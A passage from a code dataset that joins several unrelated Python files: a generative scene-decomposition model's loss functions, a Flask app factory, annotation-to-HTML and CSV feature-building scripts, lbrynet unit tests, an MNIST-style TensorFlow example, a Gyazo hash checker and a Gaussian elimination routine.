'apc_likelihood': images.new_zeros(0, images.shape[0], 1),\n }\n #‘scl' 表示物体大小的隐变量,'trs'表示物体位置的隐变量,他们均由'where_mu'和'where_logvar'得到\n #'shp_mu'和'shp_logvar'表示物体形状隐变量,解码得到物体的标准化形状shp_crop\n #'apc_latent'为物体外观隐变量,解码后得到物体的标准化外观apc_crop\n #'tau1'和 'tau2'为Beta分布的两个参数,zeta表示物体是否存在的隐变量分布参数\n result_obj.update({\n key: None for key in\n [\n 'tau1', 'tau2', 'logits_zeta', 'where_mu', 'where_logvar', 'shp_mu', 'shp_logvar',\n 'apc_latent', 'apc_likelihood','scl', 'trs', 'apc_crop', 'shp_crop',\n ]\n }) \n\n states_dict = {key: [] for key in ['states_full', 'states_crop1', 'states_crop2']}\n states_main = None\n for _ in range(self.max_objects):\n # Full\n inputs_full = self.compute_init_full_inputs(images, result_back, result_obj) # cat: images, recon, mask, batch_size*7*48*48\n states_full, states_main = self.init_full(inputs_full, states_main)\n result_full = self.enc_dec_full(states_full[0]) #'scl','trs','tau1','tau2','zeta','logits_zeta','where_mu','where_logvar'\n grid_crop, grid_full = self.compute_grid(result_full['scl'], result_full['trs'], images.shape[0]) #计算双线性采样的二维网格\n # Crop\n inputs_crop = nn.functional.grid_sample(inputs_full, grid_crop) # batch_size*7*24*24\n states_crop1,states_crop2 = self.init_crop(inputs_crop)\n # print('states_crop1[0]:',states_crop1[0].shape,'states_crop2[0]:',states_crop2[0].shape)\n # print('states_crop1[0]:',states_crop1,'states_crop2[0]:',states_crop2)\n result_crop = self.enc_dec_crop(states_crop1[0], states_crop2[0], grid_full)#'apc','shp','apc_crop','apc_crop_diff','shp_crop','what_mu','what_logvar'\n # Update storage\n update_dict = {**result_full, 
**result_crop, 'states_full': states_full, 'states_crop1': states_crop1,'states_crop2': states_crop2} \n self.initialize_storage(result_obj, states_dict, update_dict)\n # Adjust order\n self.adjust_order(images, result_obj, states_dict)\n # Result\n result = {**result_back, **result_obj}\n results = [result]\n ###############\n # Refinements #\n ###############\n for _ in range(self.num_steps):\n # Background\n inputs_back = self.compute_upd_back_inputs(images, result_back, result_obj) # batch_size*10*48*48\n states_back = self.upd_back(inputs_back, states_back)\n result_back = self.enc_dec_back(states_back[0]) # back:batch_size*3*48*48, back_mu:# batch_size*32\n # Objects\n for idx_obj in range(self.max_objects):\n # Full\n inputs_full = self.compute_upd_full_inputs(images, result_back, result_obj, idx_obj) # batch_size*7*48*48\n states_full = self.upd_full(inputs_full, states_dict['states_full'][idx_obj])\n result_full = self.enc_dec_full(states_full[0]) \n grid_crop, grid_full = self.compute_grid(result_full['scl'], result_full['trs'], images.shape[0]) # batch_size*24*24*2, batch_size*48*48*2\n apc = nn.functional.grid_sample(result_obj['apc_crop'][idx_obj], grid_full) # batch_size*3*48*48\n shp = nn.functional.grid_sample(result_obj['shp_crop'][idx_obj], grid_full) # batch_size*1*48*48\n update_dict = {'apc': apc, 'shp': shp, 'zeta': result_full['zeta']}\n self.update_storage(result_obj, None, update_dict, idx_obj)\n # Crop\n inputs_crop = self.compute_upd_crop_inputs(images, result_back, result_obj, grid_crop, idx_obj)\n states_crop1,states_crop2 = self.upd_crop(inputs_crop, states_dict['states_crop1'][idx_obj], states_dict['states_crop2'][idx_obj])\n result_crop = self.enc_dec_crop(states_crop1[0],states_crop2[0], grid_full)\n # Update storage\n update_dict = {**result_full, **result_crop, 'states_full': states_full, 'states_crop1': states_crop1, 'states_crop2': states_crop2}\n self.update_storage(result_obj, states_dict, update_dict, idx_obj)\n # Adjust order\n self.adjust_order(images, result_obj, states_dict)\n # Result\n result = {**result_back, **result_obj}\n results.append(result)\n results = [self.transform_result(n) for n in results]\n return results\n\n def compute_loss_recon(self, images, result, ratio):\n apc_n_back = torch.cat([result['apc'], result['back'][None]])\n gamma = self.compute_gamma(result['shp'], result['zeta'])\n part_diff = (images - (gamma * apc_n_back).sum(0)).pow(2)\n part_elbo = (gamma * (images[None] - apc_n_back).pow(2)).sum(0)\n part_opt = ratio * part_diff + (1 - ratio) * part_elbo\n loss = 0.5 * (self.gaussian_const + self.gaussian_invvar * (part_opt - part_opt.detach() + part_elbo.detach()))\n return loss.sum()\n\n @staticmethod\n def compute_kld_normal(mu, logvar, prior_mu, prior_logvar, prior_invvar):\n loss = 0.5 * (prior_logvar - logvar + prior_invvar * ((mu - prior_mu).pow(2) + logvar.exp()) - 1)\n return loss.sum()\n\n def compute_kld_pres(self, result):\n tau1 = result['tau1']\n tau2 = result['tau2']\n zeta = result['zeta']\n logits_zeta = result['logits_zeta']\n psi1 = torch.digamma(tau1)\n psi2 = torch.digamma(tau2)\n psi12 = torch.digamma(tau1 + tau2)\n # Beta\n loss_beta_1 = torch.lgamma(tau1 + tau2) - torch.lgamma(tau1) - torch.lgamma(tau2) - self.prior_pres_log_alpha\n loss_beta_2 = (tau1 - self.prior_pres_alpha) * psi1\n loss_beta_3 = (tau2 - 1) * psi2\n loss_beta_4 = -(tau1 + tau2 - self.prior_pres_alpha - 1) * psi12\n loss_beta = loss_beta_1 + loss_beta_2 + loss_beta_3 + loss_beta_4\n # Bernoulli\n log_zeta = 
nn.functional.logsigmoid(logits_zeta)\n log_one_minus_zeta = log_zeta - logits_zeta\n psi1_le_sum = psi1.cumsum(0)\n psi12_le_sum = psi12.cumsum(0)\n kappa1 = psi1_le_sum - psi12_le_sum\n psi1_lt_sum = torch.cat([psi1_le_sum.new_zeros(1, *psi1_le_sum.shape[1:]), psi1_le_sum[:-1]])\n logits_coef = psi2 + psi1_lt_sum - psi12_le_sum\n kappa2_list = []\n for idx in range(logits_coef.shape[0]):\n coef = torch.softmax(logits_coef[:idx + 1], dim=0)\n log_coef = nn.functional.log_softmax(logits_coef[:idx + 1], dim=0)\n coef_le_sum = coef.cumsum(0)\n coef_lt_sum = torch.cat([coef_le_sum.new_zeros(1, *coef_le_sum.shape[1:]), coef_le_sum[:-1]])\n part1 = (coef * psi2[:idx + 1]).sum(0)\n part2 = ((1 - coef_le_sum[:-1]) * psi1[:idx]).sum(0)\n part3 = -((1 - coef_lt_sum) * psi12[:idx + 1]).sum(0)\n part4 = -(coef * log_coef).sum(0)\n kappa2_list.append(part1 + part2 + part3 + part4)\n kappa2 = torch.stack(kappa2_list)\n loss_bernoulli = zeta * (log_zeta - kappa1) + (1 - zeta) * (log_one_minus_zeta - kappa2)\n return loss_beta.sum() + loss_bernoulli.sum()\n\n def compute_loss_back_prior(self, images, back):\n back_prior = images.view(*images.shape[:-2], -1).median(-1).values[..., None, None]\n loss = 0.5 * self.gaussian_invvar * (back - back_prior).pow(2).sum()\n return loss - loss.detach()\n\n def compute_loss_diff(self, x):\n loss = 0.5 * self.gaussian_invvar * x.pow(2).sum()\n return loss - loss.detach()\n\n def compute_batch_loss(self, images, result, coef_dict):\n loss_recon = self.compute_loss_recon(images, result, coef_dict['recon'])\n loss_kld_pres = self.compute_kld_pres(result)\n loss_kld_where = self.compute_kld_normal(result['where_mu'], result['where_logvar'], self.prior_where_mu,\n self.prior_where_logvar, self.prior_where_invvar)\n loss_kld_shp = self.compute_kld_normal(result['shp_mu'], result['shp_logvar'], 0, 0, 1)\n loss_apc_likelihood = result['apc_likelihood']\n loss_back_prior = coef_dict['back_prior'] * self.compute_loss_back_prior(images, result['back'])\n loss_back_likelihood = result['back_likelihood']\n loss = loss_recon + loss_kld_pres + loss_kld_where + loss_kld_shp + \\\n loss_back_prior - loss_apc_likelihood - loss_back_likelihood \n return loss\n\n def compute_log_likelihood(self, images, result, segre, recon_scene, eps=1e-10):\n diff_mixture = torch.cat([result['apc'], result['back'][None]]) - images[None]\n raw_ll_mixture = -0.5 * (self.gaussian_const + self.gaussian_invvar * diff_mixture.pow(2)).sum(-3, keepdim=True)\n ll_mixture = torch.logsumexp(segre.clamp(min=eps).log() + raw_ll_mixture, dim=0)\n ll_mixture = ll_mixture.view(ll_mixture.shape[0], -1).sum(-1)\n diff_single = recon_scene - images\n ll_single = -0.5 * (self.gaussian_const + self.gaussian_invvar * diff_single.pow(2))\n ll_single = ll_single.view(ll_single.shape[0], -1).sum(-1)\n return ll_mixture, ll_single\n\n\ndef get_model(args, path=None):\n model = Model(args)\n if path is not None:\n load_dict = torch.load(path)\n model_dict = model.state_dict()\n for key in model_dict:\n if key in load_dict and model_dict[key].shape == load_dict[key].shape:\n model_dict[key] = load_dict[key]\n else:\n print('\"{}\" not loaded'.format(key))\n model.load_state_dict(model_dict)\n return nn.DataParallel(model)\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":17865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"189112468","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 11 13:21:17 2020\n\n@author: 
BarisAlhan\n\"\"\"\n\nimport os\nfrom flask import Flask\nfrom . import db\n\ndef create_app(test_config = None):\n \n app = Flask(__name__, instance_relative_config=True)\n \n \n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n \n \n app.config.from_mapping(\n SECRET_KEY='tursu',\n DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),\n )\n \n \n if test_config is None:\n app.config.from_pyfile('config.py', silent=True)\n else:\n app.config.from_mapping(test_config)\n \n \n @app.route('/')\n def hello():\n return 'Welcome to Tursu!'\n \n \n db.init_app(app)\n \n return app","sub_path":"practice_app/backend/flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"492459017","text":"__author__ = 'charlesztt'\n\nimport os\nimport xml.etree.cElementTree as ET\nimport xml.dom.minidom\n\ndef get_sentence(event_token_id, token_list):\n first_token_id=event_token_id.split(\",\")[0]\n # print first_token_id\n start_flag=0\n for one_token in token_list:\n if first_token_id == one_token[0]:\n break\n start_flag+=1\n for i in range(start_flag,len(token_list)):\n if \"<\" in token_list[i][1]:\n break\n end_place=i\n for i in range(start_flag,0,-1):\n if \">\" in token_list[i][1]:\n break\n start_place=i+1\n sent_list=list()\n for i in range(start_place,end_place):\n sent_list.append(token_list[i][1])\n return \" \".join(sent_list)\n\ndef get_trigger(event_token_id, token_list):\n start_token_id=event_token_id.split(\",\")[0]\n end_token_id=event_token_id.split(\",\")[-1]\n start_flag=0\n for one_token in token_list:\n if start_token_id == one_token[0]:\n break\n start_flag+=1\n end_flag=0\n for one_token in token_list:\n if end_token_id == one_token[0]:\n break\n end_flag+=1\n trigger_list=list()\n for i in range(start_flag,end_flag+1):\n trigger_list.append(token_list[i][1])\n return \" \".join(trigger_list)\n\nf=open(\"./data/filelist.tab\")\n\ncandi_list=list()\n\nfor one_line in f:\n one_line=one_line.replace(\"\\r\",\"\").replace(\"\\n\",\"\")\n candi_list.append(one_line)\n\nf.close()\n\nfor one_candi in candi_list:\n event_list=list()\n f_sent=open(os.path.join(\"./data/nugget_train\",one_candi+\".txt.tab\"))\n f_sent.readline()\n token_list=list()\n for one_line in f_sent:\n one_line=one_line.replace(\"\\r\",\"\").replace(\"\\n\",\"\")\n token_list.append(one_line.split(\"\\t\")[0:2])\n f_sent.close()\n\n f_annotation=open(os.path.join(\"./data/nugget_train\",one_candi+\".ann.tab\"))\n for one_line in f_annotation:\n one_line=one_line.replace(\"\\r\",\"\").replace(\"\\n\",\"\")\n event_id=\"-\".join(one_line.split(\"\\t\")[1:3])\n event_token_id=one_line.split(\"\\t\")[3]\n event_type=one_line.split(\"\\t\")[5]\n event_sentence=get_sentence(event_token_id,token_list)\n event_trigger=get_trigger(event_token_id,token_list)\n event_list.append([event_id,event_type,event_trigger,event_sentence])\n f_annotation.close()\n\n f_source=open(os.path.join(\"./data/nugget_train\",one_candi+\".tkn.txt\"))\n empty_text=\"\"\n for one_line in f_source:\n if \"<\" in one_line and \">\" in one_line:\n if 'DOC' not in one_line:\n one_line=one_line.replace(\" \",\"\")\n else:\n if \"id\" not in one_line:\n one_line=one_line.replace(\" \",\"\")\n empty_text+=one_line\n f_source.close()\n tree=ET.fromstring(empty_text)\n notags = ET.tostring(tree, encoding='utf8', method='text')\n\n f=open(one_candi+\".html\",'w')\n f.write('
<html>'+'\\n')\n    f.write(notags.replace(\"\\n\",\"<br>\")+\"<br>\\n<br>\\n\")\n    for one_event in event_list:\n        f.write(\"ID: %s<br>\\n\"%(one_event[0]))\n        f.write(\"Type: %s<br>\\n\"%(one_event[1]))\n        f.write(\"Anchor: %s<br>\\n\"%(one_event[2]))\n        f.write(\"Extent: %s<br>\\n\"%(one_event[3]))\n        f.write(\"<br>\\n\")\n    f.write(\"</html>
    \")\n f.close()","sub_path":"python/basic_stat/readable_creator.py","file_name":"readable_creator.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"507425564","text":"import os\nimport shutil\nimport tempfile\n\nfrom hashlib import md5\nfrom twisted.trial.unittest import TestCase\nfrom twisted.internet import defer, threads\n\nfrom lbrynet import conf\nfrom lbrynet.file_manager.EncryptedFileManager import EncryptedFileManager\nfrom lbrynet.core.Session import Session\nfrom lbrynet.core.StreamDescriptor import StreamDescriptorIdentifier\nfrom lbrynet.file_manager.EncryptedFileCreator import create_lbry_file\nfrom lbrynet.lbry_file.client.EncryptedFileOptions import add_lbry_file_to_sd_identifier\nfrom lbrynet.core.StreamDescriptor import get_sd_info\nfrom lbrynet.core.PeerManager import PeerManager\nfrom lbrynet.core.RateLimiter import DummyRateLimiter\n\nfrom lbrynet.tests import mocks\n\n\nFakeNode = mocks.Node\nFakeWallet = mocks.Wallet\nFakePeerFinder = mocks.PeerFinder\nFakeAnnouncer = mocks.Announcer\nGenFile = mocks.GenFile\ntest_create_stream_sd_file = mocks.create_stream_sd_file\nDummyBlobAvailabilityTracker = mocks.BlobAvailabilityTracker\n\n\nclass TestStreamify(TestCase):\n maxDiff = 5000\n def setUp(self):\n mocks.mock_conf_settings(self)\n self.session = None\n self.lbry_file_manager = None\n self.is_generous = True\n self.db_dir = tempfile.mkdtemp()\n self.blob_dir = os.path.join(self.db_dir, \"blobfiles\")\n os.mkdir(self.blob_dir)\n\n @defer.inlineCallbacks\n def tearDown(self):\n lbry_files = self.lbry_file_manager.lbry_files\n for lbry_file in lbry_files:\n yield self.lbry_file_manager.delete_lbry_file(lbry_file)\n if self.lbry_file_manager is not None:\n yield self.lbry_file_manager.stop()\n if self.session is not None:\n yield self.session.shut_down()\n yield self.session.storage.stop()\n yield threads.deferToThread(shutil.rmtree, self.db_dir)\n if os.path.exists(\"test_file\"):\n os.remove(\"test_file\")\n\n def test_create_stream(self):\n wallet = FakeWallet()\n peer_manager = PeerManager()\n peer_finder = FakePeerFinder(5553, peer_manager, 2)\n hash_announcer = FakeAnnouncer()\n rate_limiter = DummyRateLimiter()\n sd_identifier = StreamDescriptorIdentifier()\n\n self.session = Session(\n conf.ADJUSTABLE_SETTINGS['data_rate'][1], db_dir=self.db_dir, node_id=\"abcd\",\n peer_finder=peer_finder, hash_announcer=hash_announcer,\n blob_dir=self.blob_dir, peer_port=5553,\n use_upnp=False, rate_limiter=rate_limiter, wallet=wallet,\n blob_tracker_class=DummyBlobAvailabilityTracker,\n is_generous=self.is_generous, external_ip=\"127.0.0.1\", dht_node_class=mocks.Node\n )\n\n self.lbry_file_manager = EncryptedFileManager(self.session, sd_identifier)\n\n d = self.session.setup()\n d.addCallback(lambda _: add_lbry_file_to_sd_identifier(sd_identifier))\n d.addCallback(lambda _: self.lbry_file_manager.setup())\n\n def verify_equal(sd_info):\n self.assertEqual(sd_info, test_create_stream_sd_file)\n\n def verify_stream_descriptor_file(stream_hash):\n d = get_sd_info(self.session.storage, stream_hash, True)\n d.addCallback(verify_equal)\n return d\n\n def iv_generator():\n iv = 0\n while 1:\n iv += 1\n yield \"%016d\" % iv\n\n def create_stream():\n test_file = GenFile(5209343, b''.join([chr(i + 3) for i in xrange(0, 64, 6)]))\n d = create_lbry_file(self.session, self.lbry_file_manager, \"test_file\", test_file,\n key=\"0123456701234567\", iv_generator=iv_generator())\n 
d.addCallback(lambda lbry_file: lbry_file.stream_hash)\n return d\n\n d.addCallback(lambda _: create_stream())\n d.addCallback(verify_stream_descriptor_file)\n return d\n\n def test_create_and_combine_stream(self):\n wallet = FakeWallet()\n peer_manager = PeerManager()\n peer_finder = FakePeerFinder(5553, peer_manager, 2)\n hash_announcer = FakeAnnouncer()\n rate_limiter = DummyRateLimiter()\n sd_identifier = StreamDescriptorIdentifier()\n\n self.session = Session(\n conf.ADJUSTABLE_SETTINGS['data_rate'][1], db_dir=self.db_dir, node_id=\"abcd\",\n peer_finder=peer_finder, hash_announcer=hash_announcer,\n blob_dir=self.blob_dir, peer_port=5553, dht_node_class=mocks.Node,\n use_upnp=False, rate_limiter=rate_limiter, wallet=wallet,\n blob_tracker_class=DummyBlobAvailabilityTracker, external_ip=\"127.0.0.1\"\n )\n\n self.lbry_file_manager = EncryptedFileManager(self.session, sd_identifier)\n\n @defer.inlineCallbacks\n def create_stream():\n test_file = GenFile(53209343, b''.join([chr(i + 5) for i in xrange(0, 64, 6)]))\n lbry_file = yield create_lbry_file(self.session, self.lbry_file_manager, \"test_file\", test_file)\n sd_hash = yield self.session.storage.get_sd_blob_hash_for_stream(lbry_file.stream_hash)\n self.assertTrue(lbry_file.sd_hash, sd_hash)\n yield lbry_file.start()\n f = open('test_file')\n hashsum = md5()\n hashsum.update(f.read())\n self.assertEqual(hashsum.hexdigest(), \"68959747edc73df45e45db6379dd7b3b\")\n\n d = self.session.setup()\n d.addCallback(lambda _: add_lbry_file_to_sd_identifier(sd_identifier))\n d.addCallback(lambda _: self.lbry_file_manager.setup())\n d.addCallback(lambda _: create_stream())\n return d\n","sub_path":"lbrynet/tests/functional/test_streamify.py","file_name":"test_streamify.py","file_ext":"py","file_size_in_byte":5561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"581208241","text":"\"\"\"\nExample code written for https://www.meetup.com/Big-Data-Developers-in-Madrid/\n\nWillem Hendriks, willem.hendriks@nl.ibm.com\n\nDeep learning + Data Science, 31 Jan 2017\n\"\"\"\n\n# Modified example of MNIST tensorflow classification.\n#\n# Original content licence:\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# \n\nimport tensorflow as tf\n\n# Change the data, from MNIST to images of programmers\nfrom DataFeederPython import DataFeederPython\n\n# Create the model\nx = tf.placeholder(tf.float32, [None, 784])\nW = tf.Variable(tf.zeros([784, 10]))\nb = tf.Variable(tf.zeros([10]))\ny = tf.nn.softmax(tf.matmul(x, W) + b)\n\n# Define loss and optimizer\ny_ = tf.placeholder(tf.float32, [None, 10])\n\n# The raw formulation of cross-entropy,\n#\n# tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(tf.nn.softmax(y)),\n# reduction_indices=[1]))\n#\n# can be numerically unstable.\n#\n# So here we use tf.nn.softmax_cross_entropy_with_logits on the raw\n# outputs of 'y', and then average across the batch.\ncross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))\ntrain_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\n\nsess = tf.InteractiveSession()\ntf.global_variables_initializer().run()\n# Train\n\nfor _ in range(DataFeederPython.number_of_samples * 10):\n\tbatch_xs, batch_ys = DataFeederPython.next_batch(5)\n\tsess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})\n\ntest = 
DataFeederPython.get_test()\n\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\nprint(sess.run(accuracy, feed_dict={x: test[0], y_: test[1]}))\n","sub_path":"modified_mnist_example.py","file_name":"modified_mnist_example.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"591492298","text":"import requests,sys,hashlib,argparse,os\ndef gyazoMD5Exists(md5_hash):return requests.get(\"http://gyazo.com/%s\"%(md5_hash)).status_code==200\ndef printExists(h):print(\"%s EXISTS\"%h if gyazoMD5Exists(h) else \"%s DOES NOT EXIST\"%h)\ndef getMD5(path,buffer_size=1024*1024*32):\n\twith open(path,'rb')as inp:\n\t\tdata=inp.read(buffer_size)\n\t\tmday5=hashlib.md5()\n\t\twhile len(data)>0:\n\t\t\tmday5.update(data)\n\t\t\tdata=inp.read(buffer_size)\n\t\treturn mday5.hexdigest()\ndef validHex(s):\n\ttry:int(s,16);return True\n\texcept:return False\ndef checkHexValue(h):\n\tif validHex(h):\n\t\tif len(h)==32:\n\t\t\texists=gyazoMD5Exists(h)\n\t\t\tprint(\"%s EXISTS\"%h if exists else \"%s DOES NOT EXIST\"%h)\n\t\telse:print(\"Input hexadecimal value is not 32 characters long (md5 length)\")\n\telse:print(\"Input is not a valid hexadecimal value\")\ndef checkFileValue(f,ft):\n\tif ft==None:ft=\"txt\"\n\tif os.path.exists(f):\n\t\tif os.path.isfile(f):\n\t\t\twith open(f,'r')as inp:\n\t\t\t\tdata=inp.read()\n\t\t\t\tsplitter=None\n\t\t\t\tif not \"\\r\\n\" in data:\n\t\t\t\t\tif \"\\n\" in data:splitter=\"\\n\"\n\t\t\t\telse:splitter=\"\\r\\n\"\n\t\t\t\tif splitter:data=data.split(splitter)\n\t\t\t\tif type(data)==str:printExists(data);return\n\t\t\t\tfor d in data:\n\t\t\t\t\tif len(d)<32:continue\n\t\t\t\t\tif ft==\"csv\":\n\t\t\t\t\t\thashes=d.split(\",\")\n\t\t\t\t\t\tfor h in hashes:\n\t\t\t\t\t\t\tprintExists(h)\n\t\t\t\t\telse:printExists(d)\n\t\telse:print(\"Supplied path is not a file\")\n\telse:print(\"Supplied path does not exist\")\ndef checkDirValue(d,extensions=[\".png\"],ignore_case=True):\n\tif ignore_case:extensions=[ext.lower() for ext in extensions]\n\tfs={}\n\tif os.path.exists(d):\n\t\tif os.path.isdir(d):\n\t\t\tprint(\"Searching for files with any of the following extensions %s\"%extensions)\n\t\t\tprint(\"Ignoring case\" if ignore_case else \"Not ignoring case\")\n\t\t\tfor root,dirs,files in os.walk(d):\n\t\t\t\tprint(\"Checking %s for images\"%root)\n\t\t\t\tfor f in files:\n\t\t\t\t\tdata=os.path.splitext(f)\n\t\t\t\t\tif len(data)>1:\n\t\t\t\t\t\tif (ignore_case and (data[1].lower() in extensions)) or (not ignore_case and (data[1] in extensions)):\n\t\t\t\t\t\t\tfullpath=os.path.join(root,f)\n\t\t\t\t\t\t\tprint(\"\\tChecking %s\"%fullpath,end=\"\")\n\t\t\t\t\t\t\t#print(\"\\t\\tGetting MD5\",end=\"\")\n\t\t\t\t\t\t\tmday5=getMD5(fullpath)\n\t\t\t\t\t\t\t#print(\" %s\\n\\t\\tSearching Gyazo for %s\"%(mday5,mday5),end=\"\")\n\t\t\t\t\t\t\texists=gyazoMD5Exists(mday5)\n\t\t\t\t\t\t\tprint(\"\\tFOUND\" if exists else \"\\tNOT FOUND\")\n\t\t\t\t\t\t\tfs[fullpath]=(mday5,exists)\n\t\t\treturn fs\n\t\telse:print(\"Supplied path is not a directory\")\n\telse:print(\"Supplied path ain't existing\")\nargparser=argparse.ArgumentParser()\n#argparser.add_argument(\"-v\",action=\"store_true\",help=\"output verbosity\")\nargparser.add_argument(\"input\",type=str,help=\"the input md5 hash, directory or file containing 
hashes\")\nargparser.add_argument(\"-v\",\"--verbosity\",type=int,choices=[0,1,2],nargs='?',const=2)\nargparser.add_argument(\"-ft\",\"--filetype\",type=str,choices=[\"csv\",\"txt\"],help=\"determines how file input is parsed\")\nargparser.add_argument(\"-m\",\"--md5\",action=\"store_true\",help=\"force input type to md5 hash\")\nargparser.add_argument(\"-f\",\"--file\",action=\"store_true\",help=\"force input type to input file\")\nargparser.add_argument(\"-d\",\"--dir\",action=\"store_true\",help=\"force input type to input directory\")\nargs=argparser.parse_args()\nif args.md5:checkHexValue(args.input)\nelif args.file:checkFileValue(args.input,args.filetype)\nelif args.dir:checkDirValue(args.input)\nelse:\n\tif validHex(args.input):checkHexValue(args.input)\n\telif os.path.exists(args.input):\n\t\tif os.path.isfile(args.input):checkFileValue(args.input,args.filetype)\n\t\telif os.path.isdir(args.input):checkDirValue(args.input)\n\telse:print(\"Input is not a valid hex value or path\")","sub_path":"Image Data Storage/img_check.py","file_name":"img_check.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"92126218","text":"# -*- coding: utf-8 -*-\nimport json\nimport csv\nfrom numpy import *\nfrom musigma import MUSIGMA_V,MUSIGMA_A\n\nsum_action_info = []\nsum_voice_info = []\nfin_action_info = []\nfin_voice_info = []\nbeat_info = []\ninfo = []\nmax_length = 73\n\ndef ReadActionInfo(file_name): \n action_info = []\n file = open('res/'+file_name)\n lines = file.readlines()\n action_info_index = -1\n for i in range(len(lines)):\n if i % 3 == 0:\n # 确定帧数\n action_info_index += 1\n action_info.append([])\n elif i % 3 == 1:\n # 存入中心点坐标,即每一帧的前三位\n lines[i] = lines[i].replace('\\n','')\n s = json.loads(lines[i])\n for coord in s:\n action_info[action_info_index].append(coord)\n else:\n # 存入每个关节的坐标\n lines[i] = lines[i].replace('\\n','')\n s = json.loads(lines[i])\n for joint in s:\n for coord in joint:\n action_info[action_info_index].append(coord)\n file.close()\n sum_action_info.append(action_info)\n\ndef ReadVoiceInfo(file_name): \n voice_info = []\n file = open('data1/'+file_name)\n lines = file.readlines()\n # print(len(lines))\n for line in lines:\n line = line.replace('\\n','')\n s = json.loads(line)\n voice_info.append(s)\n file.close()\n sum_voice_info.append(voice_info)\n # print('voice___info: ' + str(matrix(sum_voice_info).shape))\n\ndef ReadBeatInfo(file_name):\n file = open('beats/'+file_name)\n lines = file.readlines()\n beat_num = []\n for line in lines:\n line = line.replace('\\n','')\n beat_num.append(int(float(line)))\n beat_info.append(beat_num)\n file.close()\n\ndef WriteCsv():\n for i in range(len(fin_action_info)):\n info.append(fin_voice_info[i]+fin_action_info[i])\n print('info: ' + str(matrix(info).shape))\n csvfile = open('train.csv','w',newline=\"\")\n mywriter = csv.writer(csvfile,dialect='excel')\n mywriter.writerows(info)\n csvfile.close()\n\nfor i in range(23):\n ReadActionInfo(str(i+1))\n ReadVoiceInfo(str(i+1)+'.txt')\n ReadBeatInfo(str(i+1)+'_beat.txt')\n\nfor k in range(len(sum_voice_info)):\n N=len(sum_voice_info[k])\n N1=len(sum_voice_info[k][0])\n matrix_voice=array(sum_voice_info[k])\n for i in range(0,N1):\n for j in range(0,N):\n matrix_voice[j,i]= (matrix_voice[j,i] - MUSIGMA_V[i][0]) / MUSIGMA_V[i][1]; \n sum_voice_info[k]=matrix_voice.tolist()\n\nfor k in range(len(sum_action_info)):\n M=len(sum_action_info[k])\n M1=len(sum_action_info[k][0])\n 
matrix_action=array(sum_action_info[k])\n for i in range(0,M1):\n for j in range(0,M):\n matrix_action[j,i]= (matrix_action[j,i] - MUSIGMA_A[i][0]) / MUSIGMA_A[i][1]; \n sum_action_info[k]=matrix_action.tolist()\n\nfor i in range(len(beat_info)):\n le=(len(beat_info[i])-1)//10\n for j in range(len(beat_info[i])-1-le):\n start_num = len(fin_voice_info)\n fin_action_info += sum_action_info[i][beat_info[i][j]:beat_info[i][j+1]]\n fin_voice_info += sum_voice_info[i][beat_info[i][j]:beat_info[i][j+1]]\n\n for k in range(max_length-(beat_info[i][j+1]-beat_info[i][j])):\n action_zero = [0 for k in range(66)]\n voice_zero = [0 for k in range(19)]\n fin_action_info.append(action_zero)\n fin_voice_info.append(voice_zero)\n # 加入在动作中的帧号\n for l in range(max_length):\n fin_voice_info[start_num+l].append(l)\n\n# 加入在总体中的帧号\nfor i in range(len(fin_voice_info)):\n fin_voice_info[i].append(i)\n\nfor i in range(len(fin_voice_info)):\n if len(fin_voice_info[i]) != 21:\n print(len(fin_voice_info[i]))\nprint('final voice info: ' + str(matrix(fin_voice_info).shape))\nprint('final action info: ' + str(matrix(fin_action_info).shape))\n\n\nN=len(fin_voice_info)\nN1=len(fin_voice_info[0])\nmatrix_voice=array(fin_voice_info)\nfor i in range(19,N1):\n mu=average(matrix_voice[:,i]) \n sigma=std(matrix_voice[:,i])\n for j in range(0,N):\n matrix_voice[j,i] = (matrix_voice[j,i] - mu) / sigma; \nfin_voice_info=matrix_voice.tolist()\n\nWriteCsv()\n","sub_path":"create_csv_file.py","file_name":"create_csv_file.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"82713662","text":"def gauss_elimination(X):\n A = X.copy()\n n, m = A.shape\n for i in range(0, n):\n # Search for maximum \n maxEl = abs(A[i][i])\n maxRow = i\n for k in range(i+1, n):\n if abs(A[k][i]) > maxEl:\n maxEl = abs(A[k][i])\n maxRow = k\n\n if i != maxRow:\n tmp = A[i, :].copy()\n A[i, :] = A[maxRow, :]\n A[maxRow, :] = tmp\n\n\n # 対角成分以下をゼロ\n for k in range(i+1, n):\n c = -A[k][i]/A[i][i]\n for j in range(i, n+1):\n if i == j:\n A[k][j] = 0\n else:\n A[k][j] += c * A[i][j]\n\n # Solve equation Ax=b\n x = [0 for i in range(n)]\n for i in range(n-1, -1, -1):\n x[i] = A[i][n]/A[i][i]\n for k in range(i-1, -1, -1):\n A[k][n] -= A[k][i] * x[i]\n return 